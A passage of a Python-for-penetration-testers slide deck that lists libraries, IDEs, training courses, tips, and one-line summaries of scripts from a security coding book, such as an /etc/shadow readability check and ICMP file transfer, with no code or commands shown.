- simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API.
- PyMangle: command line tool and a Python library used to create word lists for use with other penetration testing tools (abandoned?).
- Hachoir: view and edit a binary stream field by field.

Other useful libraries and tools
- IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system.
- Beautiful Soup: HTML parser optimized for screen-scraping.
- Mayavi: 3D scientific data visualization and plotting.
- Twisted: event-driven networking engine.
- Suds: lightweight SOAP client for consuming Web Services.
- M2Crypto: most complete OpenSSL wrapper.
- NetworkX: graph library (edges, nodes).
- pyparsing: general parsing module.
- lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language.
- Whoosh: fast, featureful full-text indexing and searching library implemented in pure Python.
- Pexpect: control and automate other programs, similar to Don Libes' `Expect` system.
- Sikuli: visual technology to search and automate GUIs using screenshots. Scriptable in Jython.
- PyQt and PySide: Python bindings for the Qt application framework and GUI library.

70 Coding for Penetration Testers book – Script / Function / Learned
- Webcheck_v1.py – Monitor web server, verify it remains up. Learned: 1. Script arguments 2. Connect to web server and run a GET request
- Webcheck_v2.py – Monitor web server, verify it remains up (default to port 80). Learned: 1. Alternate script arguments method
- Subnetcalc.py – Calculate subnet mask, broadcast address, network range, and gateway from IP/CIDR. Learned: 1. Parse out values programmatically 2. Math functions with variables 3. Displaying results 4. Using FOR loops
- Pass.py – Determines if users are using the original default assigned password. Learned: 1. Use the crypt module
- Robotparser.py – Retrieve the paths from the robots.txt. Learned: 1. Parse the robots.txt file with the built-in robotparser module 2. Nesting FOR loops
- root_check.py – Checks what permissions the logged-in account has (normal user, root or system account). Learned: 1. Using IF and ELIF conditional statements 2. Use the OS module to make system calls
- Readshadow.py – Checks to see if you have permission to read /etc/shadow. Learned: 1. Use the OS module to make system calls 2. Test permissions on files to see if the current credentials can read the file
- Network_socket.py – Connect to website, pull contents (hard coded). Learned: 1. Network socket creation 2. Spaces will bite you in the ass where you least expect it.

71 Coding for Penetration Testers book – Script / Function / Learned
- network_socket_argument.py – Connect to website, pull contents (site specified by argument). Learned: 1. Network socket creation 2. Spaces will bite you in the ass where you least expect it.
- Server_connect.py – Once a connection is made, send back a string. Learned: 1. Network socket creation 2. Allow incoming connections.
- receiveICMP.py – Receive a file from another system via ICMP (in conjunction with sendICMP.py). Learned: 1. Python script using Scapy
- sendICMP.py – Send a file to another system via ICMP (in conjunction with receiveICMP.py). Learned: 1. Python script using Scapy

72 Little gems I found – Description / Function / Site
- Python-nmap – It's a Python library which helps in using nmap. Site: nmap/
- Python API to the VirtualBox VM – Allows you to control every aspect of virtual machine configuration and execution. Site: /SDKRef.pdf
- Py2Exe – py2exe is a Python Distutils extension which converts Python scripts into executable Windows programs, able to run without requiring a Python installation.
- Chrome extensions/applications – Various extensions/applications found in the Chrome Web Store:
  - https://chrome.google.com/webstore/detail/gdiimmpmdoofmahingpgabiikimjgcia – Python shell (browser button)
  - https://chrome.google.com/webstore/detail/cmlchnlmkdcpelgmkebknjgjgddncelc – Python shell (Chrome application)
  - https://chrome.google.com/webstore/detail/nckbgikkpbjdliigbhgjfgfcahhonakp – Online Python development environment

73 Little gems I found (extra extra credit) – Description / Function / Site
- Tweepy – It's the best working Python library to interface with Twitter (so far).

74 Tweepy
- Direct message
- Check friends' timelines
- Create favorites

75 Tips, tricks, etc.

IDEs (http://wiki.python.org/moin/IntegratedDevelopmentEnvironments)
- Windows: PyScripter, Aptana Studio, IDLE, Ninja, Wing IDE
- Linux: IDLE, Geany, Python Toolkit, SPE, ERIC (supposed to have auto-complete of code…)

Editors (http://wiki.python.org/moin/PythonEditors)
- Windows: Notepad++
- Linux: Gedit, SCiTE

76 Tips, tricks, etc.

Shells
- DreamPie: automatic completion of attributes and file names, history box, code box
- IDLE: included with the Python install
- IPython
- PyShell
- Guake

Other
- PythonAnywhere

77 Tips, tricks, etc. – Linux vs. Windows

Linux: Linux scripts can be run from the terminal without calling python explicitly by putting #!/usr/bin/python (the path to the interpreter) at the top and typing ./ followed by the script name. A common problem on PyScripter (awesome Windows Python IDE): extra code comments are put at the top, and only then the #!/usr/bin/python line, so the shebang no longer works.

Windows: Windows scripts don't need the #! but need to have .py associated with the Python interpreter. Scripts can be double-clicked or run from the command prompt with python and the script name. If the script is double-clicked without a raw_input("Press ENTER to exit") at the end, you may not see the output of the script.

78 Tips, tricks, etc. – Portable Python (Windows only)

Portable Python is a Python® programming language preconfigured to run directly from any USB storage device, enabling you to have, at any time, a portable programming environment. Just download it, extract it to your portable storage device or hard drive and in 10 minutes you are ready to create your next Python® application.

The Portable Python package contains the following applications/libraries: PyScripter v2.4.1, NumPy, SciPy 0.90, Matplotlib, PyWin, Django 1.3, PIL, Py2Exe, wxPython.

The Portable Python package contains the following applications/libraries (alphabetical order): NetworkX v1.4, PySerial 2.5, PyScripter v2.4.1, PyWin32 v.216, RPyC-3.0.7.

79 Additional resources

80 Beginners guides from Python Extra tools Online exercises General learning materials Additional resources

81 Additional resources
- Free online videos
- Online books
- Online interactive tutorial/interpreter: https://languageshells.appspot.com/
- Forums
- Module/package repositories: The Python Package Index is a repository of software for the Python programming language. There are currently packages here. The ActiveState Code Recipes contains 3850 snippets to learn from and use.
- Python tools for penetration testers

82 Training

SecurityTube Python Scripting Expert (python-scripting-expert/?id=main)
- Module 1: Python Scripting – Language Essentials
- Module 2: System Programming and Security
- Module 3: Network Security Programming – Sniffers and Packet Injectors
- Module 4: Attacking Web Applications
- Module 5: Exploitation Techniques
- Module 6: Malware Analysis and Reverse Engineering
- Module 7: Attack Task Automation
- Module 8: Further Study and Roadmap
- Module 9: Exam Pattern and Mock Exam

PYTHON TRAINING FOR SECURITY PROFESSIONALS
- Log Parsing with Python
- Pcap Parsing with Python
- Network Attack with Python
- Web Application Attack with Python
- Malware Analysis with Python
- Exploit Development with Python

83 All the scripts – Category / Script
- CSAW Crypto Redux – Challenge 1 to 5
- Extra credit
- Coding for Penetration Testers – part 1
- Coding for Penetration Testers – part 2
- Coding for Penetration Testers – part 3
- Extra extra credit

84 Etc.

Antigravity: when you open up Modules Docs and click on the antigravity module, or from IDLE run import antigravity, a web browser opens to the XKCD cartoon at the beginning of this slide deck.

Zen of Python: to start the path of finding the Zen of Python, remember these two key words… IMPORT THIS. From an IDE (IDLE) or a Python shell, run import this and the Zen of Python will be revealed.

85

86 Final thoughts

87 Questions? Keith #misec – Tazdrumm3r

